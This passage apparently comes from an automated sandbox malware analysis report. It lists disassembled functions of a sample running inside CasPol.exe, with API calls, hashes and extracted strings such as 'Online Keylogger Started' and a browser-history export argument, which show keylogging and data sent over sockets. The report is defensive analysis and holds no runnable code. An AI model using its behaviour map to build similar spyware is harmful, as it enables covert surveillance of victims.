                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                            • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                            • API String ID: 3024135584-2418719853
                                                                                                            • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                            • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                                            • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                            • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                                            Function 0044016A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                                                            • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                                                                            • Opcode Fuzzy Hash: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                                                            • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                                                                            Function 00410B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                            • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                            • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 3525466593-0
                                                                                                            • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                            • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                                                            • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                            • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                                                                            Function 0040E6A3 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                                              • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                            • String ID:
                                                                                                            • API String ID: 4269425633-0
                                                                                                            • Opcode ID: 964a5a3bd7df0bd74af3a8e998dd8357b76ed2a5e21fcabead6c3b94faed0554
                                                                                                            • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                                                                            • Opcode Fuzzy Hash: 964a5a3bd7df0bd74af3a8e998dd8357b76ed2a5e21fcabead6c3b94faed0554
                                                                                                            • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                                                                            Function 00443098 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID:
                                                                                                            • API String ID: 269201875-0
                                                                                                            • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                            • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                                                                            • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                            • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                                                            Function 0044FED3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
                                                                                                            • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
                                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
                                                                                                            • __freea.LIBCMT ref: 0044FFC4
                                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                            • String ID:
                                                                                                            • API String ID: 313313983-0
                                                                                                            • Opcode ID: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
                                                                                                            • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                                                            • Opcode Fuzzy Hash: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
                                                                                                            • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                                                            Function 0044E13B Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                                                            • _free.LIBCMT ref: 0044E1A0
                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 336800556-0
                                                                                                            • Opcode ID: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                                                                                                            • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                                                            • Opcode Fuzzy Hash: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                                                                                                            • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                                                            Function 00446F43 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(0000000A,0000000B,0000000A,00445359,00440A9B,00000000,?,?,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000), ref: 00446F48
                                                                                                            • _free.LIBCMT ref: 00446F7D
                                                                                                            • _free.LIBCMT ref: 00446FA4
                                                                                                            • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FB1
                                                                                                            • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FBA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 3170660625-0
                                                                                                            • Opcode ID: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
                                                                                                            • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                                                                            • Opcode Fuzzy Hash: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
                                                                                                            • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                                                                            Function 0044F79D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 0044F7B5
                                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                            • _free.LIBCMT ref: 0044F7C7
                                                                                                            • _free.LIBCMT ref: 0044F7D9
                                                                                                            • _free.LIBCMT ref: 0044F7EB
                                                                                                            • _free.LIBCMT ref: 0044F7FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                            • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                                                            • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                            • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                                                            Function 004432E7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00443305
                                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                            • _free.LIBCMT ref: 00443317
                                                                                                            • _free.LIBCMT ref: 0044332A
                                                                                                            • _free.LIBCMT ref: 0044333B
                                                                                                            • _free.LIBCMT ref: 0044334C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                            • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                                                            • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                            • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                                                                            Function 00416751 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                                            • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                                            • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                            • String ID: (FG
                                                                                                            • API String ID: 3142014140-2273637114
                                                                                                            • Opcode ID: 3dd28efe5d76cee74ea6306897125a5d17a8e39bd8f4c177ad1c2a9bab0656b7
                                                                                                            • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                                                            • Opcode Fuzzy Hash: 3dd28efe5d76cee74ea6306897125a5d17a8e39bd8f4c177ad1c2a9bab0656b7
                                                                                                            • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                                                            Function 0044D459 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _strpbrk.LIBCMT ref: 0044D4A8
                                                                                                            • _free.LIBCMT ref: 0044D5C5
                                                                                                              • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,00000000,0000000A,0000000A,00000000,0041AD67,00000022,?,?,0043A833,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
                                                                                                              • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417,0000000A,00000000), ref: 0043A878
                                                                                                              • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                            • String ID: *?$.
                                                                                                            • API String ID: 2812119850-3972193922
                                                                                                            • Opcode ID: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
                                                                                                            • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                                                                                                            • Opcode Fuzzy Hash: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
                                                                                                            • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                                                                                                            Function 004095D6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                              • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                              • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                              • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                            • String ID: XCG$`AG$>G
                                                                                                            • API String ID: 2334542088-2372832151
                                                                                                            • Opcode ID: e67731c2ca2cd1ff7fa0b2f8b36e1bf7c54a8ac1d8c345ee0f34ef58a03dc72b
                                                                                                            • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                                                            • Opcode Fuzzy Hash: e67731c2ca2cd1ff7fa0b2f8b36e1bf7c54a8ac1d8c345ee0f34ef58a03dc72b
                                                                                                            • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                                                            Function 004426D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00442714
                                                                                                            • _free.LIBCMT ref: 004427DF
                                                                                                            • _free.LIBCMT ref: 004427E9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$FileModuleName
                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                            • API String ID: 2506810119-3657627342
                                                                                                            • Opcode ID: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                                            • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                                                            • Opcode Fuzzy Hash: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                                            • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                                                            Function 00404468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92synchronizationnetworkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                            • SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EventObjectSingleWaitsend
                                                                                                            • String ID: LAL
                                                                                                            • API String ID: 3963590051-3302426157
                                                                                                            • Opcode ID: 70199d1238e0ed40ec4566022559ff14c6a96e51f72a9672ed76f9bbc42e0496
                                                                                                            • Instruction ID: 68c7e6670e460543dd9c105572fcb78fed3a06f13f8c8b410ea91b680b50408d
                                                                                                            • Opcode Fuzzy Hash: 70199d1238e0ed40ec4566022559ff14c6a96e51f72a9672ed76f9bbc42e0496
                                                                                                            • Instruction Fuzzy Hash: 192143B29001196BDF04BBA5DC96DEE777CFF54358B00013EF916B21E1EA78A604D6A4
                                                                                                            Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                              • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                            • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                            • String ID: /sort "Visit Time" /stext "$8>G
                                                                                                            • API String ID: 368326130-2663660666
                                                                                                            • Opcode ID: 5f1f106a8e53b5b8e53ee6433b744230dbb61b51347ea29cf6ce568f23d562fb
                                                                                                            • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                                                                            • Opcode Fuzzy Hash: 5f1f106a8e53b5b8e53ee6433b744230dbb61b51347ea29cf6ce568f23d562fb
                                                                                                            • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                                                                            Function 0040A876 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                            • wsprintfW.USER32 ref: 0040A905
                                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EventLocalTimewsprintf
                                                                                                            • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                                            • API String ID: 1497725170-1359877963
                                                                                                            • Opcode ID: fcd139a15132826d048fc9099f5513e63a32d772a8cf7c4d95b98b470fd5f9fd
                                                                                                            • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                                                                            • Opcode Fuzzy Hash: fcd139a15132826d048fc9099f5513e63a32d772a8cf7c4d95b98b470fd5f9fd
                                                                                                            • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                                                                            Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateThread$LocalTime$wsprintf
                                                                                                            • String ID: Online Keylogger Started
                                                                                                            • API String ID: 112202259-1258561607
                                                                                                            • Opcode ID: 54b0b085ce57371670bcfd3b34d5d472438fbf033b6369da0e754369fe511495
                                                                                                            • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                                                                            • Opcode Fuzzy Hash: 54b0b085ce57371670bcfd3b34d5d472438fbf033b6369da0e754369fe511495
                                                                                                            • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                                            Function 0044AA73 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
